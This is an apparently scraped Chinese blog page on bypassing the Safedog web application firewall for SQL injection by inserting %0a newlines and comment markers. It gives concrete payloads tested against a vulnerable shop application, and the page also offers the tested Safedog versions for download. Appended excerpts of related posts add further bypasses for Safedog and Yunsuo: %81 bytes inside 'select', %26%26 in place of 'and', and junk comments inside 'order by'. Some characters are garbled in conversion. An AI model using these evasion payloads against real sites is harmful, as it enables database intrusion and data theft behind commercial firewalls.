安全狗最新版繞過測試2023年10月23日

2021-12-30 07:22:54 字數 641 閱讀 9622

測試版本:iis版v3.3.09476(2014-09-24)、apache v3.1.08512(2014-05-29),均為今天能下到的最新版。

用於繞過的核心字元:%0a,某些特殊場合需要和注釋符配合使用。

測試詳細步驟:

1、本機安裝了存在注入的v5shop(構架為iis6+aspx+mssql2005,以測試iis版本的安全狗),常規注入測試:

and 1=user

and作為關鍵字被識別並攔截。

2、加入%0a再次嘗試:

%0aand 1=user

成功繞過並實現注入。

另外:在apache+php+mysql環境中:

先按常規進行注入嘗試:

and/**/(select user())=」

因為and、user()均為黑名單裡的關鍵字。那麼我們加入%0a再次嘗試:

%0aand/**/(select%0auser())=」

%0aand/**/(select%0auser())=』root@localhost』

當然,%0a只是乙個思路,由此發散開來便是多個%0a疊加,或者與注釋符–、/**/混合使用。比如:

成功繞過,毫無壓力 。

另:測試用到的安全狗版本已打包: (包含了iis和apache版本)

安全狗最新版V3 3繞過攔截注入漏洞

最新版安全狗的攔截過濾存在問題,導致可以繞過攔截進行注入 對於select from 的攔截可在 select 前後或中間插入 81 ff,即可繞過攔截注入如 id 1 20union 20sel 81ect 201,2 20from 20admin id 1 20union 20select 81...

利用邏輯特性bypass最新版安全狗SQL注入

email protected 師傅一直在發bypass安全狗的例子,心裡怪癢癢的,發一枚 關於 符號和 1 按位與運算子 按位與運算將兩個運算分量的對應位按位遵照以下規則進行計算 0 0 0,0 1 0,1 0 0,1 1 1。即同為 1 的位,結果為 1,否則結果為 0。例如,設3的內部表示為 ...

雲鎖最新版SQL注入WAF繞過

這裡使用sqli labs第一關字元型注入來測試 直接使用and 1 1肯定會被攔截 使用 26 26即可代替and繞過,1 1可以用true表示,1 2可以用false表示 直接使用order by被攔截 使用order 60000ghtwf01 by繞過 和order by一樣繞過姿勢,使用un...